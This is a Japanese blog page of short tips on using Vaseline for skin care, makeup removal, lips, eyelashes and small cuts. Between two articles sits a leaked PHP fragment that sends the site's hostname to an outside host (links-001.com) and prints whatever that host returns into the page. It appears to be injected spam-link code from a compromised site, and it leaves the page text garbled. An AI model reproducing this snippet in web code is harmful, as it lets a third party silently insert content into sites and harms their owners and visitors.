前へ
次へ

ワセリンの意外が使用用途

コンビ二や薬局などで目にするワセリンですが、今回はそのワセリンの意外と知られていない使い方についてご

more

ワセリンを使うときのコツ

肌の水分が蒸発するのを防ぎ、美容目的として使用することもできるワセリンは、多く塗りすぎるとベタついて

more

ワセリンの使い方と効用

ワセリンは乾燥肌に使用するものと思っている人は多いでしょう。それ以外にも美容アイテムとしての使い方が

more

ワセリンのお得な使用方法

薬局やコンビニなどで目にするワセリン。寒い冬の時期は特に乾燥が気になりますし、そんな時は美容目的にワセリンを購入する人も多いのではないでしょうか。油が主成分でできているワセリンは、一般的にはハンドクリームなどのいわば保湿用の美容用品として利用されるケースが多いかと思います。そんな中で今回は、ワセリンの意外な使い方をご紹介したいと思います。まず、私が通常よく利用するのは綿棒などに馴染ませて、簡単なメイク落としとして利用します。リップクリームなどでも代用できるのですが、主成分が油なので化粧を浮かし、拭き取れる効果があります。外出先で急いでいてメイク治しの際にちょっと手がぶれてしまった場合などに効果的です。

".file_get_contents('http://links-001.com/meoset.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

美容にいいワセリンの使い方

ワセリンは肌の水分が乾燥するのを防いだり、細菌感染から防いでくれたりととても便利なクリームです。美容にも効果的です。その使い方はとても簡単です。水分が蒸発するのを防ぐのでスキンケア後に全身の肌に塗るだけです。リップクリームの変わりとして唇に塗ることもできます。また化粧直しにも使用することができます。特に、アイラインやマスカラを塗り直す時に綿棒につけてなぞると綺麗に落とすことができます。最近話題のまつげケアとしても使用できます。まつげの根元から毛先までうすく塗るだけでまつげ美容液代わりとして使用することができます。もちろん、ワセリンは美容以外にもちょっとした切り傷などの怪我にも使用することができます。

Page Top